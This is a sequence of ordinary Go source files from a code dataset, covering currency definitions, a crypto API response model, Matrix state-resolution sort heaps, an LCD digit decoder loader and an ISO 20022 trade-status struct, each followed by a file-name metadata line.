SCR = Currency{Name: "Seychellois Rupee", IsoCode: "SCR", Symbol: "₨", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SDG = Currency{Name: "Sudanese Pound", IsoCode: "SDG", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SEK = Currency{Name: "Swedish Krona", IsoCode: "SEK", Symbol: "kr", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
SGD = Currency{Name: "Singapore Dollar", IsoCode: "SGD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SHP = Currency{Name: "Saint Helenian Pound", IsoCode: "SHP", Symbol: "£", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SKK = Currency{Name: "Slovak Koruna", IsoCode: "SKK", Symbol: "Sk", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SLL = Currency{Name: "Sierra Leonean Leone", IsoCode: "SLL", Symbol: "Le", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SOS = Currency{Name: "Somali Shilling", IsoCode: "SOS", Symbol: "Sh", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SRD = Currency{Name: "Surinamese Dollar", IsoCode: "SRD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SSP = Currency{Name: "South Sudanese Pound", IsoCode: "SSP", Symbol: "£", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
STD = Currency{Name: "São Tomé and Pr<NAME>", IsoCode: "STD", Symbol: "Db", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SVC = Currency{Name: "Salvadoran Colón", IsoCode: "SVC", Symbol: "₡", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SYP = Currency{Name: "<NAME>", IsoCode: "SYP", Symbol: "£S", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SZL = Currency{Name: "Swazi Lilangeni", IsoCode: "SZL", Symbol: "E", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
THB = Currency{Name: "<NAME>", IsoCode: "THB", Symbol: "฿", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TJS = Currency{Name: "T<NAME>", IsoCode: "TJS", Symbol: "ЅМ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TMT = Currency{Name: "Turkmenistani Manat", IsoCode: "TMT", Symbol: "T", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TND = Currency{Name: "Tunisian Dinar", IsoCode: "TND", Symbol: "د.ت", SymbolFirst: false, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
TOP = Currency{Name: "Tongan Paʻanga", IsoCode: "TOP", Symbol: "T$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TRY = Currency{Name: "Turkish Lira", IsoCode: "TRY", Symbol: "₺", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
TTD = Currency{Name: "Trinidad and Tobago Dollar", IsoCode: "TTD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TWD = Currency{Name: "New Taiwan Dollar", IsoCode: "TWD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TZS = Currency{Name: "Tanzanian Shilling", IsoCode: "TZS", Symbol: "Sh", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
UAH = Currency{Name: "Ukrainian Hryvnia", IsoCode: "UAH", Symbol: "₴", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
UGX = Currency{Name: "Ugandan Shilling", IsoCode: "UGX", Symbol: "USh", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
USD = Currency{Name: "United States Dollar", IsoCode: "USD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
UYU = Currency{Name: "Uruguayan Peso", IsoCode: "UYU", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
UZS = Currency{Name: "Uzbekistan Som", IsoCode: "UZS", Symbol: "so'm", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
VEF = Currency{Name: "<NAME>", IsoCode: "VEF", Symbol: "Bs.F", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
VES = Currency{Name: "<NAME>", IsoCode: "VES", Symbol: "Bs", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
VND = Currency{Name: "Vietname<NAME>", IsoCode: "VND", Symbol: "₫", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: '.', DecimalMark: ','}
VUV = Currency{Name: "<NAME>", IsoCode: "VUV", Symbol: "Vt", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
WST = Currency{Name: "<NAME>", IsoCode: "WST", Symbol: "T", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
XAF = Currency{Name: "Central African Cfa Franc", IsoCode: "XAF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XAG = Currency{Name: "Silver (Troy Ounce)", IsoCode: "XAG", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XAU = Currency{Name: "Gold (Troy Ounce)", IsoCode: "XAU", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBA = Currency{Name: "European Composite Unit", IsoCode: "XBA", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBB = Currency{Name: "European Monetary Unit", IsoCode: "XBB", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBC = Currency{Name: "European Unit of Account 9", IsoCode: "XBC", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBD = Currency{Name: "European Unit of Account 17", IsoCode: "XBD", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XCD = Currency{Name: "East Caribbean Dollar", IsoCode: "XCD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
XDR = Currency{Name: "Special Drawing Rights", IsoCode: "XDR", Symbol: "SDR", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XFU = Currency{Name: "UIC Franc", IsoCode: "XFU", Symbol: "", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
XOF = Currency{Name: "West African Cfa Franc", IsoCode: "XOF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XPD = Currency{Name: "Palladium", IsoCode: "XPD", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XPF = Currency{Name: "Cfp Franc", IsoCode: "XPF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XPT = Currency{Name: "Platinum", IsoCode: "XPT", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XTS = Currency{Name: "Codes specifically reserved for testing purposes", IsoCode: "XTS", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
YER = Currency{Name: "Yemeni Rial", IsoCode: "YER", Symbol: "﷼", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ZAR = Currency{Name: "South African Rand", IsoCode: "ZAR", Symbol: "R", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ZMW = Currency{Name: "Zambian Kwacha", IsoCode: "ZMW", Symbol: "K", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ZWL = Currency{Name: "Zimbabwean Dollar", IsoCode: "ZWL", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
)
// A slice with all pre-defined currencies.
var AllCurrencies []Currency = []Currency{
AED,
AFN,
ALL,
AMD,
ANG,
AOA,
ARS,
AUD,
AWG,
AZN,
BAM,
BBD,
BCH,
BDT,
BGN,
BHD,
BIF,
BMD,
BND,
BOB,
BRL,
BSD,
BTC,
BTN,
BWP,
BYN,
BZD,
CAD,
CDF,
CHF,
CLF,
CLP,
CNH,
CNY,
COP,
CRC,
CUC,
CUP,
CVE,
CZK,
DJF,
DKK,
DOP,
DZD,
EEK,
EGP,
ERN,
ETB,
EUR,
FJD,
FKP,
GBP,
GBX,
GEL,
GGP,
GHS,
GIP,
GMD,
GNF,
GTQ,
GYD,
HKD,
HNL,
HRK,
HTG,
HUF,
IDR,
ILS,
IMP,
INR,
IQD,
IRR,
ISK,
JEP,
JMD,
JOD,
JPY,
KES,
KGS,
KHR,
KMF,
KPW,
KRW,
KWD,
KYD,
KZT,
LAK,
LBP,
LKR,
LRD,
LSL,
LTL,
LVL,
LYD,
MAD,
MDL,
MGA,
MKD,
MMK,
MNT,
MOP,
MRO,
MTL,
MUR,
MVR,
MWK,
MXN,
MYR,
MZN,
NAD,
NGN,
NIO,
NOK,
NPR,
NZD,
OMR,
PAB,
PEN,
PGK,
PHP,
PKR,
PLN,
PYG,
QAR,
RON,
RSD,
RUB,
RWF,
SAR,
SBD,
SCR,
SDG,
SEK,
SGD,
SHP,
SKK,
SLL,
SOS,
SRD,
SSP,
STD,
SVC,
SYP,
SZL,
THB,
TJS,
TMT,
TND,
TOP,
TRY,
TTD,
TWD,
TZS,
UAH,
UGX,
USD,
UYU,
UZS,
VEF,
VES,
VND,
VUV,
WST,
XAF,
XAG,
XAU,
XBA,
XBB,
XBC,
XBD,
XCD,
XDR,
XFU,
XOF,
XPD,
XPF,
XPT,
XTS,
YER,
ZAR,
ZMW,
ZWL,
} | currency.go | 0.608943 | 0.473901 | currency.go | starcoder |
package cryptoapis
import (
"encoding/json"
)
// ListInternalTransactionsByAddressRI is the response item model for the
// "list internal transactions by address" endpoint. All fields are required
// by the API and serialized under the JSON keys shown in the struct tags.
type ListInternalTransactionsByAddressRI struct {
	// Defines the specific amount of the transaction.
	Amount string `json:"amount"`
	// Represents the hash of the block where this transaction was mined/confirmed for first time. The hash is defined as a cryptographic digital fingerprint made by hashing the block header twice through the SHA256 algorithm.
	MinedInBlockHash string `json:"minedInBlockHash"`
	// Represents the height of the block where this transaction was mined/confirmed for first time. The height is defined as the number of blocks in the blockchain preceding this specific block.
	MinedInBlockHeight int32 `json:"minedInBlockHeight"`
	// Represents the unique internal transaction ID in regards to the parent transaction (type trace address).
	OperationID string `json:"operationID"`
	// Defines the call type of the internal transaction.
	OperationType string `json:"operationType"`
	// Defines the specific hash of the parent transaction.
	ParentHash string `json:"parentHash"`
	// Represents the recipient address with the respective amount.
	Recipient string `json:"recipient"`
	// Represents the sender address with the respective amount.
	Sender string `json:"sender"`
	// Timestamp of the transaction — presumably Unix epoch seconds; confirm against the API documentation.
	Timestamp int32 `json:"timestamp"`
}
// NewListInternalTransactionsByAddressRI instantiates a new
// ListInternalTransactionsByAddressRI object, setting every API-required
// property from the corresponding argument. The argument list will change
// whenever the set of required properties changes.
func NewListInternalTransactionsByAddressRI(amount string, minedInBlockHash string, minedInBlockHeight int32, operationID string, operationType string, parentHash string, recipient string, sender string, timestamp int32) *ListInternalTransactionsByAddressRI {
	return &ListInternalTransactionsByAddressRI{
		Amount:             amount,
		MinedInBlockHash:   minedInBlockHash,
		MinedInBlockHeight: minedInBlockHeight,
		OperationID:        operationID,
		OperationType:      operationType,
		ParentHash:         parentHash,
		Recipient:          recipient,
		Sender:             sender,
		Timestamp:          timestamp,
	}
}
// NewListInternalTransactionsByAddressRIWithDefaults instantiates a new
// ListInternalTransactionsByAddressRI object with only defaulted properties
// set; it does not guarantee that API-required properties are populated.
func NewListInternalTransactionsByAddressRIWithDefaults() *ListInternalTransactionsByAddressRI {
	return &ListInternalTransactionsByAddressRI{}
}
// GetAmount returns the Amount field value, or the zero string when the
// receiver is nil.
func (o *ListInternalTransactionsByAddressRI) GetAmount() string {
	if o != nil {
		return o.Amount
	}
	return ""
}
// GetAmountOk returns a pointer to the Amount field value together with a
// boolean reporting whether the receiver was usable (non-nil).
func (o *ListInternalTransactionsByAddressRI) GetAmountOk() (*string, bool) {
	if o != nil {
		return &o.Amount, true
	}
	return nil, false
}
// SetAmount sets field value
func (o *ListInternalTransactionsByAddressRI) SetAmount(v string) {
o.Amount = v
}
// GetMinedInBlockHash returns the MinedInBlockHash field value
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHash() string {
if o == nil {
var ret string
return ret
}
return o.MinedInBlockHash
}
// GetMinedInBlockHashOk returns a tuple with the MinedInBlockHash field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHashOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.MinedInBlockHash, true
}
// SetMinedInBlockHash sets field value
func (o *ListInternalTransactionsByAddressRI) SetMinedInBlockHash(v string) {
o.MinedInBlockHash = v
}
// GetMinedInBlockHeight returns the MinedInBlockHeight field value
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHeight() int32 {
if o == nil {
var ret int32
return ret
}
return o.MinedInBlockHeight
}
// GetMinedInBlockHeightOk returns a tuple with the MinedInBlockHeight field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetMinedInBlockHeightOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.MinedInBlockHeight, true
}
// SetMinedInBlockHeight sets field value
func (o *ListInternalTransactionsByAddressRI) SetMinedInBlockHeight(v int32) {
o.MinedInBlockHeight = v
}
// GetOperationID returns the OperationID field value
func (o *ListInternalTransactionsByAddressRI) GetOperationID() string {
if o == nil {
var ret string
return ret
}
return o.OperationID
}
// GetOperationIDOk returns a tuple with the OperationID field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetOperationIDOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.OperationID, true
}
// SetOperationID sets field value
func (o *ListInternalTransactionsByAddressRI) SetOperationID(v string) {
o.OperationID = v
}
// GetOperationType returns the OperationType field value
func (o *ListInternalTransactionsByAddressRI) GetOperationType() string {
if o == nil {
var ret string
return ret
}
return o.OperationType
}
// GetOperationTypeOk returns a tuple with the OperationType field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetOperationTypeOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.OperationType, true
}
// SetOperationType sets field value
func (o *ListInternalTransactionsByAddressRI) SetOperationType(v string) {
o.OperationType = v
}
// GetParentHash returns the ParentHash field value
func (o *ListInternalTransactionsByAddressRI) GetParentHash() string {
if o == nil {
var ret string
return ret
}
return o.ParentHash
}
// GetParentHashOk returns a tuple with the ParentHash field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetParentHashOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.ParentHash, true
}
// SetParentHash sets field value
func (o *ListInternalTransactionsByAddressRI) SetParentHash(v string) {
o.ParentHash = v
}
// GetRecipient returns the Recipient field value
func (o *ListInternalTransactionsByAddressRI) GetRecipient() string {
if o == nil {
var ret string
return ret
}
return o.Recipient
}
// GetRecipientOk returns a tuple with the Recipient field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetRecipientOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.Recipient, true
}
// SetRecipient sets field value
func (o *ListInternalTransactionsByAddressRI) SetRecipient(v string) {
o.Recipient = v
}
// GetSender returns the Sender field value
func (o *ListInternalTransactionsByAddressRI) GetSender() string {
if o == nil {
var ret string
return ret
}
return o.Sender
}
// GetSenderOk returns a tuple with the Sender field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetSenderOk() (*string, bool) {
if o == nil {
return nil, false
}
return &o.Sender, true
}
// SetSender sets field value
func (o *ListInternalTransactionsByAddressRI) SetSender(v string) {
o.Sender = v
}
// GetTimestamp returns the Timestamp field value
func (o *ListInternalTransactionsByAddressRI) GetTimestamp() int32 {
if o == nil {
var ret int32
return ret
}
return o.Timestamp
}
// GetTimestampOk returns a tuple with the Timestamp field value
// and a boolean to check if the value has been set.
func (o *ListInternalTransactionsByAddressRI) GetTimestampOk() (*int32, bool) {
if o == nil {
return nil, false
}
return &o.Timestamp, true
}
// SetTimestamp sets field value
func (o *ListInternalTransactionsByAddressRI) SetTimestamp(v int32) {
o.Timestamp = v
}
// MarshalJSON serializes the model to JSON. Every field here is required by
// the API, so all of them are always emitted; the generated `if true { ... }`
// guards were degenerate dead conditionals and have been removed.
func (o ListInternalTransactionsByAddressRI) MarshalJSON() ([]byte, error) {
	toSerialize := map[string]interface{}{
		"amount":             o.Amount,
		"minedInBlockHash":   o.MinedInBlockHash,
		"minedInBlockHeight": o.MinedInBlockHeight,
		"operationID":        o.OperationID,
		"operationType":      o.OperationType,
		"parentHash":         o.ParentHash,
		"recipient":          o.Recipient,
		"sender":             o.Sender,
		"timestamp":          o.Timestamp,
	}
	return json.Marshal(toSerialize)
}
type NullableListInternalTransactionsByAddressRI struct {
value *ListInternalTransactionsByAddressRI
isSet bool
}
func (v NullableListInternalTransactionsByAddressRI) Get() *ListInternalTransactionsByAddressRI {
return v.value
}
func (v *NullableListInternalTransactionsByAddressRI) Set(val *ListInternalTransactionsByAddressRI) {
v.value = val
v.isSet = true
}
func (v NullableListInternalTransactionsByAddressRI) IsSet() bool {
return v.isSet
}
func (v *NullableListInternalTransactionsByAddressRI) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableListInternalTransactionsByAddressRI(val *ListInternalTransactionsByAddressRI) *NullableListInternalTransactionsByAddressRI {
return &NullableListInternalTransactionsByAddressRI{value: val, isSet: true}
}
func (v NullableListInternalTransactionsByAddressRI) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableListInternalTransactionsByAddressRI) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | model_list_internal_transactions_by_address_ri.go | 0.858955 | 0.452838 | model_list_internal_transactions_by_address_ri.go | starcoder |
package gomatrixserverlib
import (
"strings"
)
// A stateResV2ConflictedPowerLevel is used to sort the events by effective
// power level, origin server TS and the lexicographical comparison of event
// IDs. It is a bit of an optimisation to use this - by working out the
// effective power level etc ahead of time, we use less CPU cycles during the
// sort.
type stateResV2ConflictedPowerLevel struct {
	powerLevel     int    // effective power level, computed before sorting
	originServerTS int64  // origin server timestamp of the event
	eventID        string // event ID, used as the final tie-breaker
	event          *Event // the underlying event
}
// A stateResV2ConflictedPowerLevelHeap is used to sort the events using
// sort.Sort or by using the heap functions for further optimisation. Sorting
// ensures that the results are deterministic.
type stateResV2ConflictedPowerLevelHeap []*stateResV2ConflictedPowerLevel

// Len implements sort.Interface.
func (s stateResV2ConflictedPowerLevelHeap) Len() int {
	return len(s)
}
// Less implements sort.Interface. The resulting order is: higher effective
// power level first, then larger origin server timestamp first, then the
// lexicographically greater event ID first — making the sort fully
// deterministic even for ties.
func (s stateResV2ConflictedPowerLevelHeap) Less(i, j int) bool {
	// Try to tiebreak on the effective power level
	if s[i].powerLevel > s[j].powerLevel {
		return true
	}
	if s[i].powerLevel < s[j].powerLevel {
		return false
	}
	// If we've reached here then s[i].powerLevel == s[j].powerLevel
	// so instead try to tiebreak on origin server TS
	if s[i].originServerTS < s[j].originServerTS {
		return false
	}
	if s[i].originServerTS > s[j].originServerTS {
		return true
	}
	// If we've reached here then s[i].originServerTS == s[j].originServerTS
	// so instead try to tiebreak on a lexicographical comparison of the event ID
	// (the [:] full-string slice is a no-op on strings).
	return strings.Compare(s[i].eventID[:], s[j].eventID[:]) > 0
}
// Swap implements sort.Interface.
func (s stateResV2ConflictedPowerLevelHeap) Swap(i, j int) {
	s[j], s[i] = s[i], s[j]
}

// Push implements heap.Interface.
func (s *stateResV2ConflictedPowerLevelHeap) Push(x interface{}) {
	entry := x.(*stateResV2ConflictedPowerLevel)
	*s = append(*s, entry)
}

// Pop implements heap.Interface, removing and returning the final element.
func (s *stateResV2ConflictedPowerLevelHeap) Pop() interface{} {
	last := len(*s) - 1
	entry := (*s)[last]
	*s = (*s)[:last]
	return entry
}
// A stateResV2ConflictedOther is used to sort the events by power level
// mainline positions, origin server TS and the lexicographical comparison of
// event IDs. It is a bit of an optimisation to use this - by working out the
// effective power level etc ahead of time, we use less CPU cycles during the
// sort.
type stateResV2ConflictedOther struct {
	mainlinePosition int    // position on the power-event mainline, computed before sorting
	originServerTS   int64  // origin server timestamp of the event
	eventID          string // event ID, used as the final tie-breaker
	event            *Event // the underlying event
}
// A stateResV2ConflictedOtherHeap is used to sort the events using
// sort.Sort or by using the heap functions for further optimisation. Sorting
// ensures that the results are deterministic.
type stateResV2ConflictedOtherHeap []*stateResV2ConflictedOther

// Len implements sort.Interface.
func (s stateResV2ConflictedOtherHeap) Len() int {
	return len(s)
}
// Less implements sort.Interface. The resulting order is: larger mainline
// position first, then smaller origin server timestamp first, then the
// lexicographically smaller event ID first. Note the timestamp/event-ID
// direction is deliberately the opposite of the power-level heap above.
func (s stateResV2ConflictedOtherHeap) Less(i, j int) bool {
	// Try to tiebreak on the mainline position
	if s[i].mainlinePosition < s[j].mainlinePosition {
		return false
	}
	if s[i].mainlinePosition > s[j].mainlinePosition {
		return true
	}
	// If we've reached here then s[i].mainlinePosition == s[j].mainlinePosition
	// so instead try to tiebreak on origin server TS
	if s[i].originServerTS < s[j].originServerTS {
		return true
	}
	if s[i].originServerTS > s[j].originServerTS {
		return false
	}
	// If we've reached here then s[i].originServerTS == s[j].originServerTS
	// so instead try to tiebreak on a lexicographical comparison of the event ID
	// (the [:] full-string slice is a no-op on strings).
	return strings.Compare(s[i].eventID[:], s[j].eventID[:]) < 0
}
// Swap implements sort.Interface
func (s stateResV2ConflictedOtherHeap) Swap(i, j int) {
s[i], s[j] = s[j], s[i]
}
// Push implements heap.Interface
func (s *stateResV2ConflictedOtherHeap) Push(x interface{}) {
*s = append(*s, x.(*stateResV2ConflictedOther))
}
// Pop implements heap.Interface
func (s *stateResV2ConflictedOtherHeap) Pop() interface{} {
old := *s
n := len(old)
x := old[n-1]
*s = old[:n-1]
return x
} | stateresolutionv2heaps.go | 0.672869 | 0.41947 | stateresolutionv2heaps.go | starcoder |
package lcd
import (
"fmt"
"strconv"
"github.com/aamcrae/config"
)
// Create a 7 segment decoder using the configuration data provided.
// Recognised config sections: "threshold" (a single percentage), "offset"
// (an x/y shift applied to every digit), "lcd" (digit templates) and
// "digit" (template instances). Malformed entries return an error that
// includes the config line number.
func CreateLcdDecoder(conf config.Conf) (*LcdDecoder, error) {
	var xoff, yoff int
	l := NewLcdDecoder()
	// threshold is a percentage defining the point between the
	// min and max sampled values where 'on' and 'off' are measured.
	t := conf.Get("threshold")
	if len(t) > 0 {
		v := readInts(t[0].Tokens)
		if len(v) == 1 {
			l.Threshold = v[0]
		}
	}
	// offset defines a bulk adjustment to all digits, as x and y offsets.
	o := conf.Get("offset")
	if len(o) > 0 {
		v := readInts(o[0].Tokens)
		if len(v) == 2 {
			xoff = v[0]
			yoff = v[1]
		}
	}
	// lcd defines one 7 segment digit template.
	// The format is a name followed by 3 pairs of x/y offsets defining the corners
	// of the digit (relative to implied top left of 0,0), followed by a value defining
	// the pixel width of the segment elements.
	for _, e := range conf.Get("lcd") {
		if len(e.Tokens) < 1 {
			return nil, fmt.Errorf("No config for template at line %d", e.Lineno)
		}
		name := e.Tokens[0]
		v := readInts(e.Tokens[1:])
		var dp []int
		// 9 values means an extra trailing x/y pair is present — presumably
		// the decimal point position; TODO confirm against AddTemplate.
		if len(v) == 9 {
			dp = v[7:9]
		} else if len(v) != 7 {
			return nil, fmt.Errorf("Bad config for template at line %d", e.Lineno)
		}
		if err := l.AddTemplate(name, v[:6], dp, v[6]); err != nil {
			return nil, fmt.Errorf("Invalid config at line %d: %v", e.Lineno, err)
		}
	}
	// digit declares an instance of a digit.
	// A string references the template name, followed by the point (x,y) defining
	// the top left corner of the digit (adjusted using the global offset).
	for _, e := range conf.Get("digit") {
		if len(e.Tokens) != 3 && len(e.Tokens) != 5 {
			return nil, fmt.Errorf("Bad digit config line %d", e.Lineno)
		}
		v := readInts(e.Tokens[1:])
		if len(v) != 2 && len(v) != 4 {
			return nil, fmt.Errorf("Bad config for digit at line %d", e.Lineno)
		}
		_, err := l.AddDigit(e.Tokens[0], v[0]+xoff, v[1]+yoff)
		if err != nil {
			return nil, fmt.Errorf("Invalid digit config at line %d: %v", e.Lineno, err)
		}
	}
	return l, nil
}
// readInts parses the leading run of base-10 integers (32-bit range) from
// strs, stopping silently at the first token that does not parse. The
// result is never nil.
func readInts(strs []string) []int {
	vals := []int{}
	for _, s := range strs {
		n, err := strconv.ParseInt(s, 10, 32)
		if err != nil {
			break
		}
		vals = append(vals, int(n))
	}
	return vals
}
package iso20022
// Provides information on the status of a trade.
type TradeData1 struct {
	// Refers to the identification of a notification.
	NotificationIdentification *Max35Text `xml:"NtfctnId"`
	// Reference to the unique identification assigned to a trade by a central matching system.
	MatchingSystemUniqueReference *Max35Text `xml:"MtchgSysUnqRef"`
	// Identifies the party which assigned a status to a treasury trade.
	StatusOriginator *Max35Text `xml:"StsOrgtr,omitempty"`
	// Specifies the new status of a trade.
	CurrentStatus *TradeStatus1Code `xml:"CurSts"`
	// Description of the status of a trade when no coded form is available.
	ExtendedCurrentStatus *Extended350Code `xml:"XtndedCurSts"`
	// Additional information on the current status of a trade in a central system.
	CurrentStatusSubType *Max70Text `xml:"CurStsSubTp,omitempty"`
	// Specifies the time at which the current status was assigned.
	CurrentStatusTime *ISODateTime `xml:"CurStsTm,omitempty"`
	// Specifies the previous status of a trade.
	PreviousStatus *TradeStatus1Code `xml:"PrvsSts,omitempty"`
	// Description of the status of a trade when no coded form is available.
	ExtendedPreviousStatus *Extended350Code `xml:"XtndedPrvsSts,omitempty"`
	// Additional information on the previous status of a trade in a central system.
	PreviousStatusSubType *Max70Text `xml:"PrvsStsSubTp,omitempty"`
	// Specifies the time at which the previous status was assigned.
	PreviousStatusTime *ISODateTime `xml:"PrvsStsTm,omitempty"`
	// Specifies the product for which the status of the confirmation is reported.
	ProductType *Max4AlphaNumericText `xml:"PdctTp,omitempty"`
}
// SetNotificationIdentification sets the NotificationIdentification field.
func (t *TradeData1) SetNotificationIdentification(value string) {
	t.NotificationIdentification = (*Max35Text)(&value)
}

// SetMatchingSystemUniqueReference sets the MatchingSystemUniqueReference field.
func (t *TradeData1) SetMatchingSystemUniqueReference(value string) {
	t.MatchingSystemUniqueReference = (*Max35Text)(&value)
}

// SetStatusOriginator sets the StatusOriginator field.
func (t *TradeData1) SetStatusOriginator(value string) {
	t.StatusOriginator = (*Max35Text)(&value)
}

// SetCurrentStatus sets the CurrentStatus field.
func (t *TradeData1) SetCurrentStatus(value string) {
	t.CurrentStatus = (*TradeStatus1Code)(&value)
}

// SetExtendedCurrentStatus sets the ExtendedCurrentStatus field.
func (t *TradeData1) SetExtendedCurrentStatus(value string) {
	t.ExtendedCurrentStatus = (*Extended350Code)(&value)
}

// SetCurrentStatusSubType sets the CurrentStatusSubType field.
func (t *TradeData1) SetCurrentStatusSubType(value string) {
	t.CurrentStatusSubType = (*Max70Text)(&value)
}

// SetCurrentStatusTime sets the CurrentStatusTime field.
func (t *TradeData1) SetCurrentStatusTime(value string) {
	t.CurrentStatusTime = (*ISODateTime)(&value)
}

// SetPreviousStatus sets the PreviousStatus field.
func (t *TradeData1) SetPreviousStatus(value string) {
	t.PreviousStatus = (*TradeStatus1Code)(&value)
}

// SetExtendedPreviousStatus sets the ExtendedPreviousStatus field.
func (t *TradeData1) SetExtendedPreviousStatus(value string) {
	t.ExtendedPreviousStatus = (*Extended350Code)(&value)
}

// SetPreviousStatusSubType sets the PreviousStatusSubType field.
func (t *TradeData1) SetPreviousStatusSubType(value string) {
	t.PreviousStatusSubType = (*Max70Text)(&value)
}

// SetPreviousStatusTime sets the PreviousStatusTime field.
func (t *TradeData1) SetPreviousStatusTime(value string) {
	t.PreviousStatusTime = (*ISODateTime)(&value)
}
func (t *TradeData1) SetProductType(value string) {
t.ProductType = (*Max4AlphaNumericText)(&value)
} | TradeData1.go | 0.770292 | 0.422505 | TradeData1.go | starcoder |
package memstore
import (
"bufio"
"fmt"
"github.com/uber/aresdb/memstore/common"
"github.com/uber/aresdb/memstore/list"
"github.com/uber/aresdb/utils"
"io"
"os"
"reflect"
"unsafe"
)
